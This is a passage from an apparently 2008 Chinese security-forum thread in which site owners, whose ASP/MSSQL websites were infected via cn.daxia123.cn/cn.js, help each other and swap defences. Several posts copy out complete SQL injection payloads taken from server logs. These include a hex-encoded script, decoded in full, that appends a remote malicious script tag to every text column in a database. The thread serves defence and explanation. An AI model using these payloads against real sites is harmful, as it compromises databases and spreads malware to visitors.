瑞星卡卡安全论坛技术交流区入侵防御(HIPS) 求助!被http://cn.daxia123.cn/cn.js入侵或者是病毒、攻击

12345678»   3  /  9  页   跳转

求助!被http://cn.daxia123.cn/cn.js入侵或者是病毒、攻击

回复:求助!被http://cn.daxia123.cn/cn.js入侵或者是病毒、攻击

继续关注啊,网站真的是离不开人啦
gototop
 

回复: 求助!被http://cn.daxia123.cn/cn.js入侵或者是病毒、攻击

台湾也有部份网站被害了

我的观察是,它不是病毒,只是单纯的用网址+参数就可以更新数据库里的数据


第一次使用
http://xxx.xxx.xxx/xxx.asp?xxx=xxx' AnD (sElEcT ChAr(94)+cAsT(CoUnT(1) aS VaRcHaR(100))+ChAr(94) fRoM [mAsTeR]..[sYsDaTaBaSeS])>0 AnD ''='

第二次使用
http://xxx.xxx.xxx/xxx.asp?xxx=xxx%' AnD (sElEcT ChAr(94)+cAsT(CoUnT(1) aS VaRcHaR(100))+ChAr(94) fRoM [mAsTeR]..[sYsDaTaBaSeS])>0 And '%'='

第三次使用
http://xxx.xxx.xxx/xxx.asp?xxx=xxx;dEcLaRe @S VaRcHaR(4000) SeT @s=cAsT(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F636E2E64617869613132332E636E2F636E2E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 aS VaRcHaR(4000));eXeC(@s);--

第四次使用
[url=http://xxx.xxx.xxx/xxx.asp?xxx=xxx%]http://xxx.xxx.xxx/xxx.asp?xxx=xxx%'[/url] ;dEcLaRe @S VaRcHaR(4000) SeT @s=cAsT(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F636E2E64617869613132332E636E2F636E2E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 aS VaRcHaR(4000));eXeC(@s);-- aNd '%'='

第五次使用
http://xxx.xxx.xxx/xxx.asp?xxx=xxx';dEcLaRe @S VaRcHaR(4000) SeT @s=cAsT(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F636E2E64617869613132332E636E2F636E2E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 aS VaRcHaR(4000));eXeC(@s);--

这些二进制编码是:
DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name FROM sysobjects a,syscolumns b
WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://cn.daxia123.cn/cn.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C END
CLOSE Table_Cursor DEALLOCATE Table_Cursor

此种方法的破坏程度非常严重丫!!!

没有防止注入,总有一次会成功的
我数据库复原后,自己还傻傻的试了一次…又得重新复原一次
除了防止注入是否还有更好的办法呢?
最后编辑yuchou7 最后编辑于 2008-12-27 10:36:38
gototop
 

回复:求助!被http://cn.daxia123.cn/cn.js入侵或者是病毒、攻击

最终报告,目前我的网站经过防水处理后,网站运行正常了,通过对客户注册攻击的日志看,在大量的注水代码,呵呵,注水攻击方式简单、可跨平台,黑客可能喜欢这样的攻击。
建议大家把防注水代码写到你的数据库打开的诸如conn.asp等页面,每次数据库打开的时候都验证数据的安全性!
gototop
 

回复:求助!被http://cn.daxia123.cn/cn.js入侵或者是病毒、攻击

转载:
我的观察是,它不是病毒,只是单纯的用网址+参数就可以更新数据库里的数据


第一次使用
[url]http://xxx.xxx.xxx/xxx.asp?xxx=xxx'[/url] AnD (sElEcT ChAr(94)+cAsT(CoUnT(1) aS VaRcHaR(100))+ChAr(94) fRoM [mAsTeR]..[sYsDaTaBaSeS])>0 AnD ''='

第二次使用
[url]http://xxx.xxx.xxx/xxx.asp?xxx=xxx%'[/url] AnD (sElEcT ChAr(94)+cAsT(CoUnT(1) aS VaRcHaR(100))+ChAr(94) fRoM [mAsTeR]..[sYsDaTaBaSeS])>0 And '%'='

第三次使用
http://xxx.xxx.xxx/xxx.asp?xxx=xxx;dEcLaRe @S VaRcHaR(4000) SeT @s=cAsT(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F636E2E64617869613132332E636E2F636E2E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 aS VaRcHaR(4000));eXeC(@s);--

第四次使用
[url]http://xxx.xxx.xxx/xxx.asp?xxx=xxx%'[/url] ;dEcLaRe @S VaRcHaR(4000) SeT @s=cAsT(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F636E2E64617869613132332E636E2F636E2E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 aS VaRcHaR(4000));eXeC(@s);-- aNd '%'='

第五次使用
[url]http://xxx.xxx.xxx/xxx.asp?xxx=xxx'[/url];dEcLaRe @S VaRcHaR(4000) SeT @s=cAsT(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F636E2E64617869613132332E636E2F636E2E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 aS VaRcHaR(4000));eXeC(@s);--

这些二进制编码是:
DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name FROM sysobjects a,syscolumns b
WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://cn.daxia123.cn/cn.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C END
CLOSE Table_Cursor DEALLOCATE Table_Cursor

此种方法的破坏程度非常严重丫!!!
gototop
 

回复:求助!被http://cn.daxia123.cn/cn.js入侵或者是病毒、攻击

我也中了这个大侠123的木马,我使用了一个暂时解决的办法,对vachar或nvachar字段长度做了限制,找出该字段最长的字段长度N,然后将该字段的最大长度设为N,发现效果还可以,至少已经有2天没有被注入了,其他如ntext或text字段的就做了一个触发器的限制,不允许插入script。

如果按13楼所说是2进制注入的话,我觉得可以通过判断post值的长度来临时解决,毕竟正常情况下不会传一个这么长的值吧
gototop
 

回复:求助!被http://cn.daxia123.cn/cn.js入侵或者是病毒、攻击

我的网站也这样了,和楼主一模一样,
gototop
 

回复:求助!被http://cn.daxia123.cn/cn.js入侵或者是病毒、攻击

看日志解释过来如下:这几句起什么作用的啊?那个长字符串是个什么意思?
'and (select char(94)+cast(count(1) as varchar(100))+char(94) from [master]..[sysdatabases])>0 and ''='

declare @S varchar(4000)
set @s=cast(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F636E2E64617869613132332E636E2F636E2E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 as varchar(4000));
exec(@s);
gototop
 

回复 27F huangguaxuan 的帖子

那些二进制编码是:
DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name FROM sysobjects a,syscolumns b
WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://cn.daxia123.cn/cn.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C END
CLOSE Table_Cursor DEALLOCATE Table_Cursor

就是把你数据库里符合条件的字段给update 加上 <script src=http://cn.daxia123.cn/cn.js></script>字符串

參考資料
http://blog.yam.com/yuchou/article/18968167
最后编辑yuchou7 最后编辑于 2008-12-27 18:03:44
gototop
 

回复:求助!被http://cn.daxia123.cn/cn.js入侵或者是病毒、攻击

我们的网站也是这样的,始于12月初,也是cn.daxia123.cn/cn.js
但是不象是直接注入到数据库中,而是直接修改网站文件,不管怎么设NTFS权限,他都能修改,有时还能建立系统用户,不知道从哪里进来的。
gototop
 

回复:求助!被http://cn.daxia123.cn/cn.js入侵或者是病毒、攻击

把服务器上的数据库完全卸载,重装数据库,重新还原数据,
加上防注入代码,应该就可以了
我的站被daxia123整了2天2夜啊,刚刚还原,现在可以了
gototop
 
12345678»   3  /  9  页   跳转
页面顶部
Powered by Discuz!NT